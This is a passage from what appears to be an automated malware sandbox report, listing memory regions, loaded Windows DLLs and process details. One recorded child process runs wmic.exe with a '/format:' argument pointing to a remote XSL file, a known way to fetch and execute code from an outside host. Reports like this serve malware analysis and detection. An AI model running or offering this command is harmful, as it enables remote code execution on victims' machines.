"c:\\windows\\system32\\locale.nls") Region: id = 536 start_va = 0x1b69e820000 end_va = 0x1b69e82ffff entry_point = 0x0 region_type = private name = "private_0x000001b69e820000" filename = "" Region: id = 537 start_va = 0x7ff7aafe0000 end_va = 0x7ff7ab0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7aafe0000" filename = "" Region: id = 538 start_va = 0x7ffc164b0000 end_va = 0x7ffc1654cfff entry_point = 0x7ffc164b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 539 start_va = 0x1b69e460000 end_va = 0x1b69e466fff entry_point = 0x0 region_type = private name = "private_0x000001b69e460000" filename = "" Region: id = 540 start_va = 0x1b69e650000 end_va = 0x1b69e650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e650000" filename = "" Region: id = 541 start_va = 0x1b69e660000 end_va = 0x1b69e666fff entry_point = 0x0 region_type = private name = "private_0x000001b69e660000" filename = "" Region: id = 542 start_va = 0x7ffbfcc10000 end_va = 0x7ffbfcc68fff entry_point = 0x7ffbfcc10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 543 start_va = 0x7ffc11ef0000 end_va = 0x7ffc12075fff entry_point = 0x7ffc11ef0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 544 start_va = 0x7ffc144e0000 end_va = 0x7ffc14549fff entry_point = 0x7ffc144e0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 545 start_va = 0x7ffc14800000 end_va = 0x7ffc14942fff entry_point = 0x7ffc14800000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 546 start_va = 0x7ffc14950000 end_va = 0x7ffc14a6bfff entry_point = 0x7ffc14950000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 547 start_va = 0x7ffc15fd0000 end_va = 0x7ffc1624cfff entry_point = 0x7ffc15fd0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 548 start_va = 0x7ffc16660000 end_va = 0x7ffc166bafff entry_point = 0x7ffc16660000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 549 start_va = 0x7ffc167d0000 end_va = 0x7ffc1680afff entry_point = 0x7ffc167d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 550 start_va = 0x7ffc169e0000 end_va = 0x7ffc16b65fff entry_point = 0x7ffc169e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 551 start_va = 0x7ffc16fb0000 end_va = 0x7ffc17070fff entry_point = 0x7ffc16fb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 552 start_va = 0x7ffc171d0000 end_va = 0x7ffc17325fff entry_point = 0x7ffc171d0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 553 start_va = 0x90fa800000 end_va = 0x90fa83ffff entry_point = 0x0 region_type = private name = "private_0x00000090fa800000" filename = "" Region: id = 554 start_va = 0x1b69e670000 end_va = 0x1b69e7f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e670000" filename = "" Region: id = 555 start_va = 0x1b69e800000 end_va = 0x1b69e800fff entry_point = 0x0 region_type = private name = "private_0x000001b69e800000" filename = "" Region: id = 556 start_va = 0x1b69e810000 end_va = 0x1b69e810fff entry_point = 0x0 region_type = private name = "private_0x000001b69e810000" filename = "" Region: id = 557 start_va = 0x1b69e830000 end_va = 0x1b69e9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e830000" filename = "" Region: id = 558 start_va = 0x1b69e9c0000 end_va = 0x1b69fdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69e9c0000" filename = "" Region: id = 559 start_va = 0x1b69fe50000 end_va = 0x1b69fe5ffff entry_point = 0x0 region_type = private name = "private_0x000001b69fe50000" filename = "" Region: id = 560 start_va = 0x7ffc13a20000 end_va = 0x7ffc13a33fff entry_point = 0x7ffc13a20000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 561 start_va = 0x7ffc13a40000 end_va = 0x7ffc13a8afff entry_point = 0x7ffc13a40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 562 start_va = 0x7ffc13aa0000 end_va = 0x7ffc13aaefff entry_point = 0x7ffc13aa0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 563 start_va = 0x7ffc13c50000 end_va = 0x7ffc14293fff entry_point = 0x7ffc13c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 564 start_va = 0x7ffc14490000 end_va = 0x7ffc144d2fff entry_point = 0x7ffc14490000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 565 start_va = 0x7ffc14740000 end_va = 0x7ffc147f4fff entry_point = 0x7ffc14740000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 566 start_va = 0x7ffc14a70000 end_va = 0x7ffc15fcefff entry_point = 0x7ffc14a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 567 start_va = 0x7ffc16250000 end_va = 0x7ffc162f6fff entry_point = 0x7ffc16250000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 568 start_va = 0x7ffc173a0000 end_va = 0x7ffc173f1fff entry_point = 0x7ffc173a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 569 start_va = 0x7ffc123a0000 end_va = 0x7ffc12435fff entry_point = 0x7ffc123a0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 570 start_va = 0x90fa840000 end_va = 0x90fa87ffff entry_point = 0x0 region_type = private name = "private_0x00000090fa840000" filename = "" Region: id = 571 start_va = 0x1b69fe20000 end_va = 0x1b69fe21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fe20000" filename = "" Region: id = 572 start_va = 0x1b69fe30000 end_va = 0x1b69fe30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fe30000" filename = "" Region: id = 573 start_va = 0x1b69fe60000 end_va = 0x1b69ff73fff entry_point = 0x0 region_type = private name = "private_0x000001b69fe60000" filename = "" Region: id = 574 start_va = 0x1b69ff80000 end_va = 0x1b69ff8ffff entry_point = 0x0 region_type = private name = "private_0x000001b69ff80000" filename = "" Region: id = 575 start_va = 0x1b69ff90000 end_va = 0x1b6a02c6fff entry_point = 0x1b69ff90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 576 start_va = 0x1b6a02d0000 end_va = 0x1b6a04e7fff entry_point = 0x0 region_type = private name = "private_0x000001b6a02d0000" filename = "" Region: id = 577 start_va = 0x1b6a04f0000 end_va = 0x1b6a0705fff entry_point = 0x0 region_type = private name = "private_0x000001b6a04f0000" filename = "" Region: id = 578 start_va = 0x1b6a0710000 end_va = 0x1b6a0926fff entry_point = 0x0 region_type = private name = "private_0x000001b6a0710000" filename = "" Region: id = 579 start_va = 0x1b6a0930000 end_va = 0x1b6a0a38fff entry_point = 0x0 region_type = private name = "private_0x000001b6a0930000" filename = "" Region: id = 580 start_va = 0x7ffc16810000 end_va = 0x7ffc16969fff entry_point = 0x7ffc16810000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 581 start_va = 0x1b69fdc0000 end_va = 0x1b69fdc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fdc0000" filename = "" Region: id = 582 start_va = 0x1b6a0a40000 end_va = 0x1b6a0afbfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b6a0a40000" filename = "" Region: id = 583 start_va = 0x7ffc119f0000 end_va = 0x7ffc11a11fff entry_point = 0x7ffc119f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 584 start_va = 0x7ffc120e0000 end_va = 0x7ffc120f2fff entry_point = 0x7ffc120e0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 585 start_va = 0x7ffc13830000 end_va = 0x7ffc13885fff entry_point = 0x7ffc13830000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 586 start_va = 0x1b69fdd0000 end_va = 0x1b69fdd6fff entry_point = 0x0 region_type = private name = "private_0x000001b69fdd0000" filename = "" Region: id = 587 start_va = 0x1b69fde0000 end_va = 0x1b69fde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fde0000" filename = "" Region: id = 588 start_va = 0x1b69fdf0000 end_va = 0x1b69fdf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fdf0000" filename = "" Region: id = 589 start_va = 0x1b69fe00000 end_va = 0x1b69fe00fff entry_point = 0x1b69fe00000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 590 start_va = 0x1b69fe10000 end_va = 0x1b69fe14fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fe10000" filename = "" Region: id = 591 start_va = 0x1b69fe40000 end_va = 0x1b69fe41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b69fe40000" filename = "" Region: id = 592 start_va = 0x1b6a0b00000 end_va = 0x1b6a0b8bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001b6a0b00000" filename = "" Region: id = 593 start_va = 0x7ffc097b0000 end_va = 0x7ffc09a23fff entry_point = 0x7ffc097b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Thread: id = 34 os_tid = 0xde0 Thread: id = 35 os_tid = 0xdbc Thread: id = 36 os_tid = 0xda4 Thread: id = 37 os_tid = 0xe28 Process: id = "4" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1d1b5000" os_pid = "0xd94" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xccc" cmd_line = "wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" " cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\" os_username = "X2VS1CUM\\Nd9E1FYi" os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 603 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 604 start_va = 0x3500000000 end_va = 0x35001fffff entry_point = 0x0 region_type = private name = "private_0x0000003500000000" filename = "" Region: id = 605 start_va = 0x3500200000 end_va = 0x350027ffff entry_point = 0x0 region_type = private name = "private_0x0000003500200000" filename = "" Region: id = 606 start_va = 0x233e1000000 end_va = 0x233e101ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1000000" filename = "" Region: id = 607 start_va = 0x233e1020000 end_va = 0x233e1034fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1020000" filename = "" Region: id = 608 start_va = 0x233e1040000 end_va = 0x233e1043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1040000" filename = "" Region: id = 609 start_va = 0x233e1050000 end_va = 0x233e1050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1050000" filename = "" Region: id = 610 start_va = 0x233e1060000 end_va = 0x233e1061fff entry_point = 0x0 region_type = private name = "private_0x00000233e1060000" filename = "" Region: id = 611 start_va = 0x7df5ff900000 end_va = 0x7ff5ff8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff900000" filename = "" Region: id = 612 start_va = 0x7ff66df40000 end_va = 0x7ff66df62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff66df40000" filename = "" Region: id = 613 start_va = 0x7ff66e670000 end_va = 0x7ff66e6f1fff entry_point = 0x7ff66e670000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe") Region: id = 614 start_va = 0x7ffc17400000 end_va = 0x7ffc175c0fff entry_point = 0x7ffc17400000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 615 start_va = 0x233e1210000 end_va = 0x233e130ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1210000" filename = "" Region: id = 616 start_va = 0x7ffc14550000 end_va = 0x7ffc14737fff entry_point = 0x7ffc14550000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 617 start_va = 0x7ffc17120000 end_va = 0x7ffc171ccfff entry_point = 0x7ffc17120000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 618 start_va = 0x3500280000 end_va = 0x35002fffff entry_point = 0x0 region_type = private name = "private_0x0000003500280000" filename = "" Region: id = 619 start_va = 0x233e1000000 end_va = 0x233e100ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1000000" filename = "" Region: id = 620 start_va = 0x233e1010000 end_va = 0x233e1016fff entry_point = 0x0 region_type = private name = "private_0x00000233e1010000" filename = "" Region: id = 621 start_va = 0x233e1070000 end_va = 0x233e112dfff entry_point = 0x233e1070000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 622 start_va = 0x233e14f0000 end_va = 0x233e14fffff entry_point = 0x0 region_type = private name = "private_0x00000233e14f0000" filename = "" Region: id = 623 start_va = 0x7ff66de40000 end_va = 0x7ff66df3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff66de40000" filename = "" Region: id = 624 start_va = 0x7ffbfe150000 end_va = 0x7ffbfe19dfff entry_point = 0x7ffbfe150000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 625 start_va = 0x7ffc0c8d0000 end_va = 0x7ffc0c907fff entry_point = 0x7ffc0c8d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 626 start_va = 0x7ffc136a0000 end_va = 0x7ffc136ccfff entry_point = 0x7ffc136a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 627 start_va = 0x7ffc144e0000 end_va = 0x7ffc14549fff entry_point = 0x7ffc144e0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 628 start_va = 0x7ffc14950000 end_va = 0x7ffc14a6bfff entry_point = 0x7ffc14950000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 629 start_va = 0x7ffc15fd0000 end_va = 0x7ffc1624cfff entry_point = 0x7ffc15fd0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 630 start_va = 0x7ffc164b0000 end_va = 0x7ffc1654cfff entry_point = 0x7ffc164b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 631 start_va = 0x7ffc16660000 end_va = 0x7ffc166bafff entry_point = 0x7ffc16660000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 632 start_va = 0x233e1130000 end_va = 0x233e1136fff entry_point = 0x0 region_type = private name = "private_0x00000233e1130000" filename = "" Region: id = 633 start_va = 0x233e1310000 end_va = 0x233e13ecfff entry_point = 0x233e1310000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 634 start_va = 0x7ffc13aa0000 end_va = 0x7ffc13aaefff entry_point = 0x7ffc13aa0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 635 start_va = 0x233e1140000 end_va = 0x233e1140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1140000" filename = "" Region: id = 636 start_va = 0x7ffc16550000 end_va = 0x7ffc165f6fff entry_point = 0x7ffc16550000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 637 start_va = 0x233e1150000 end_va = 0x233e1150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1150000" filename = "" Region: id = 638 start_va = 0x7ffc06b80000 end_va = 0x7ffc06b90fff entry_point = 0x7ffc06b80000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 639 start_va = 0x7ffc16970000 end_va = 0x7ffc169dafff entry_point = 0x7ffc16970000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 640 start_va = 0x7ffc07e60000 end_va = 0x7ffc07edefff entry_point = 0x7ffc07e60000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 641 start_va = 0x7ffc13950000 end_va = 0x7ffc13978fff entry_point = 0x7ffc13950000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 642 start_va = 0x233e1500000 end_va = 0x233e1836fff entry_point = 0x233e1500000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 643 start_va = 0x7ffc16fb0000 end_va = 0x7ffc17070fff entry_point = 0x7ffc16fb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 644 start_va = 0x233e1310000 end_va = 0x233e1452fff entry_point = 0x233e1310000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 645 start_va = 0x7ffbfc900000 end_va = 0x7ffbfcb3efff entry_point = 0x7ffbfc900000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 646 start_va = 0x233e1840000 end_va = 0x233e1a2ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1840000" filename = "" Region: id = 647 start_va = 0x233e1310000 end_va = 0x233e14dffff entry_point = 0x0 region_type = private name = "private_0x00000233e1310000" filename = "" Region: id = 648 start_va = 0x233e1310000 end_va = 0x233e144ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1310000" filename = "" Region: id = 649 start_va = 0x233e14d0000 end_va = 0x233e14dffff entry_point = 0x0 region_type = private name = "private_0x00000233e14d0000" filename = "" Region: id = 650 start_va = 0x233e1160000 end_va = 0x233e11dffff entry_point = 0x0 region_type = private name = "private_0x00000233e1160000" filename = "" Region: id = 651 start_va = 0x233e1310000 end_va = 0x233e138ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1310000" filename = "" Region: id = 652 start_va = 0x233e1440000 end_va = 0x233e144ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1440000" filename = "" Region: id = 653 start_va = 0x233e1160000 end_va = 0x233e11bffff entry_point = 0x0 region_type = private name = "private_0x00000233e1160000" filename = "" Region: id = 654 start_va = 0x233e11d0000 end_va = 0x233e11dffff entry_point = 0x0 region_type = private name = "private_0x00000233e11d0000" filename = "" Region: id = 655 start_va = 0x233e1840000 end_va = 0x233e195ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1840000" filename = "" Region: id = 656 start_va = 0x233e1a20000 end_va = 0x233e1a2ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1a20000" filename = "" Region: id = 657 start_va = 0x233e1160000 end_va = 0x233e1161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1160000" filename = "" Region: id = 658 start_va = 0x233e1170000 end_va = 0x233e1170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1170000" filename = "" Region: id = 659 start_va = 0x233e11b0000 end_va = 0x233e11bffff entry_point = 0x0 region_type = private name = "private_0x00000233e11b0000" filename = "" Region: id = 660 start_va = 0x233e1840000 end_va = 0x233e191ffff entry_point = 0x233e1840000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 661 start_va = 0x233e1950000 end_va = 0x233e195ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1950000" filename = "" Region: id = 662 start_va = 0x233e1a30000 end_va = 0x233e1e2ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1a30000" filename = "" Region: id = 663 start_va = 0x233e1180000 end_va = 0x233e1180fff entry_point = 0x233e1180000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 664 start_va = 0x233e1190000 end_va = 0x233e11affff entry_point = 0x0 region_type = private name = "private_0x00000233e1190000" filename = "" Region: id = 665 start_va = 0x7ffc079e0000 end_va = 0x7ffc07b97fff entry_point = 0x7ffc079e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 666 start_va = 0x7ffc16250000 end_va = 0x7ffc162f6fff entry_point = 0x7ffc16250000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 667 start_va = 0x7ffc14740000 end_va = 0x7ffc147f4fff entry_point = 0x7ffc14740000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 668 start_va = 0x7ffc173a0000 end_va = 0x7ffc173f1fff entry_point = 0x7ffc173a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 669 start_va = 0x7ffc169e0000 end_va = 0x7ffc16b65fff entry_point = 0x7ffc169e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 670 start_va = 0x7ffc171d0000 end_va = 0x7ffc17325fff entry_point = 0x7ffc171d0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 671 start_va = 0x7ffc0d740000 end_va = 0x7ffc0dac1fff entry_point = 0x7ffc0d740000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 672 start_va = 0x7ffc13c50000 end_va = 0x7ffc14293fff entry_point = 0x7ffc13c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 673 start_va = 0x7ffc14490000 end_va = 0x7ffc144d2fff entry_point = 0x7ffc14490000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 674 start_va = 0x7ffc13a40000 end_va = 0x7ffc13a8afff entry_point = 0x7ffc13a40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 675 start_va = 0x7ffc13a20000 end_va = 0x7ffc13a33fff entry_point = 0x7ffc13a20000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 676 start_va = 0x233e1310000 end_va = 0x233e1348fff entry_point = 0x233e1310000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 677 start_va = 0x233e1380000 end_va = 0x233e138ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1380000" filename = "" Region: id = 678 start_va = 0x233e1e30000 end_va = 0x233e1fb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1e30000" filename = "" Region: id = 679 start_va = 0x7ffc167d0000 end_va = 0x7ffc1680afff entry_point = 0x7ffc167d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 680 start_va = 0x233e11c0000 end_va = 0x233e11cffff entry_point = 0x233e11c0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui") Region: id = 681 start_va = 0x233e1fc0000 end_va = 0x233e2140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1fc0000" filename = "" Region: id = 682 start_va = 0x233e2150000 end_va = 0x233e354ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e2150000" filename = "" Region: id = 683 start_va = 0x233e11e0000 end_va = 0x233e11e0fff entry_point = 0x0 region_type = private name = "private_0x00000233e11e0000" filename = "" Region: id = 684 start_va = 0x233e11f0000 end_va = 0x233e11f0fff entry_point = 0x0 region_type = private name = "private_0x00000233e11f0000" filename = "" Region: id = 685 start_va = 0x7ffc06700000 end_va = 0x7ffc0698dfff entry_point = 0x7ffc06700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 686 start_va = 0x7ffc14800000 